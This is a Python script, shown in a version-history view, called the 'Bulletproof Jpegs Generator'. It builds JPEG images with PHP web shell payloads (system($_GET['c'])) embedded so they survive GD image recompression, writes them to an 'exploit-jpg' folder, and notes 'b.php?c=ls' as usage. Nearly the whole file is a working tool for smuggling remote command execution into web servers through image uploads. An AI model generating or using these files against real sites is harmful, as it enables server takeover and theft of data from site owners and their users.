2016-10-18 11:13:23 +00:00
|
|
|
#!/usr/bin/python
|
|
|
|
|
|
|
|
"""
|
|
|
|
Bulletproof Jpegs Generator
|
|
|
|
Copyright (C) 2012 Damien "virtualabs" Cauquil
|
|
|
|
|
|
|
|
This program is free software; you can redistribute it and/or modify
|
|
|
|
it under the terms of the GNU General Public License as published by
|
|
|
|
the Free Software Foundation; either version 2 of the License, or
|
|
|
|
(at your option) any later version.
|
|
|
|
|
|
|
|
This program is distributed in the hope that it will be useful,
|
|
|
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
|
|
GNU General Public License for more details.
|
|
|
|
|
|
|
|
You should have received a copy of the GNU General Public License along
|
|
|
|
with this program; if not, write to the Free Software Foundation, Inc.,
|
|
|
|
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
2022-08-21 14:38:54 +00:00
|
|
|
|
|
|
|
-------------
|
|
|
|
# How to use
|
|
|
|
b.php?c=ls
|
|
|
|
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
2016-10-18 11:13:23 +00:00
|
|
|
"""
|
2019-02-17 22:47:18 +00:00
|
|
|
from __future__ import print_function
|
2016-10-18 11:13:23 +00:00
|
|
|
|
2019-02-17 22:47:18 +00:00
|
|
|
from future import standard_library
|
|
|
|
standard_library.install_aliases()
|
|
|
|
from builtins import range
|
2016-10-18 11:13:23 +00:00
|
|
|
import struct,sys,os
|
|
|
|
import gd
|
2019-02-17 22:47:18 +00:00
|
|
|
from io import StringIO
|
2016-10-18 11:13:23 +00:00
|
|
|
from random import randint,shuffle
|
|
|
|
from time import time
|
|
|
|
|
|
|
|
# image width/height (square)
|
|
|
|
N = 32
|
|
|
|
|
|
|
|
|
|
|
|
def insertPayload(_in, _out, payload,off):
|
|
|
|
"""
|
|
|
|
Payload insertion (quick JPEG parsing and patching)
|
|
|
|
"""
|
|
|
|
img = _in
|
|
|
|
# look for 'FF DA' (SOS)
|
|
|
|
sos = img.index("\xFF\xDA")
|
|
|
|
sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
|
|
|
|
sod = sos_size+2
|
|
|
|
# look for 'FF D9' (EOI)
|
|
|
|
eoi = img[sod:].index("\xFF\xD9")
|
|
|
|
# enough size ?
|
|
|
|
if (eoi - sod - off)>=len(payload):
|
|
|
|
_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
|
|
|
|
return True
|
|
|
|
else:
|
|
|
|
return False
|
|
|
|
|
|
|
|
if __name__=='__main__':
|
|
|
|
|
2019-02-17 22:47:18 +00:00
|
|
|
print("[+] Virtualabs' Nasty bulletproof Jpeg generator")
|
|
|
|
print(" | website: http://virtualabs.fr")
|
|
|
|
print(" | contact: virtualabs -at- gmail -dot- com")
|
|
|
|
print("")
|
2016-10-18 11:13:23 +00:00
|
|
|
|
|
|
|
payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
|
|
|
|
|
|
|
|
# make sure the exploit-jpg directory exists or create it
|
|
|
|
if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
|
2019-02-17 22:47:18 +00:00
|
|
|
print("[!] Please remove the file named 'exploit-jpg' from the current directory")
|
2016-10-18 11:13:23 +00:00
|
|
|
elif not os.path.exists('exploit-jpg'):
|
|
|
|
os.mkdir('exploit-jpg')
|
|
|
|
|
|
|
|
# start generation
|
2019-02-17 22:47:18 +00:00
|
|
|
print('[i] Generating ...')
|
|
|
|
for q in list(range(50,100))+[-1]:
|
2016-10-18 11:13:23 +00:00
|
|
|
# loop over every payload
|
|
|
|
for p in payloads:
|
|
|
|
# not done yet
|
|
|
|
done = False
|
|
|
|
start = time()
|
|
|
|
# loop while not done and timeout not reached
|
|
|
|
while not done and (time()-start)<10.0:
|
|
|
|
|
|
|
|
# we create a NxN pixels image, true colors
|
|
|
|
img = gd.image((N,N),True)
|
|
|
|
# we create a palette
|
|
|
|
pal = []
|
|
|
|
for i in range(N*N):
|
|
|
|
pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
|
|
|
|
# we shuffle this palette
|
|
|
|
shuffle(pal)
|
|
|
|
# and fill the image with it
|
|
|
|
pidx = 0
|
|
|
|
for x in range(N):
|
|
|
|
for y in range(N):
|
|
|
|
img.setPixel((x,y),pal[pidx])
|
|
|
|
pidx+=1
|
|
|
|
|
|
|
|
# write down the image
|
|
|
|
out_jpg = StringIO('')
|
|
|
|
img.writeJpeg(out_jpg,q)
|
|
|
|
out_raw = out_jpg.getvalue()
|
|
|
|
|
|
|
|
# now, we try to insert the payload various ways
|
|
|
|
for i in range(64):
|
|
|
|
test_jpg = StringIO('')
|
|
|
|
if insertPayload(out_raw,test_jpg,p,i):
|
|
|
|
try:
|
|
|
|
# write down the new jpeg file
|
|
|
|
f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
|
|
|
|
f.write(test_jpg.getvalue())
|
|
|
|
f.close()
|
|
|
|
|
|
|
|
# load it with GD
|
|
|
|
test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
|
|
|
|
final_jpg = StringIO('')
|
|
|
|
test.writeJpeg(final_jpg,q)
|
|
|
|
final_raw = final_jpg.getvalue()
|
|
|
|
# does it contain our payload ?
|
|
|
|
if p in final_raw:
|
|
|
|
# Yay !
|
2019-02-17 22:47:18 +00:00
|
|
|
print('[i] Jpeg quality %d ... DONE'%q)
|
2016-10-18 11:13:23 +00:00
|
|
|
done = True
|
|
|
|
break
|
2019-02-17 22:47:18 +00:00
|
|
|
except IOError as e:
|
2016-10-18 11:13:23 +00:00
|
|
|
pass
|
|
|
|
else:
|
|
|
|
break
|
|
|
|
if not done:
|
|
|
|
# payload not found, we remove the file
|
|
|
|
os.unlink('exploit-jpg/exploit-%d.jpg'%q)
|
|
|
|
else:
|
|
|
|
break
|
|
|
|
|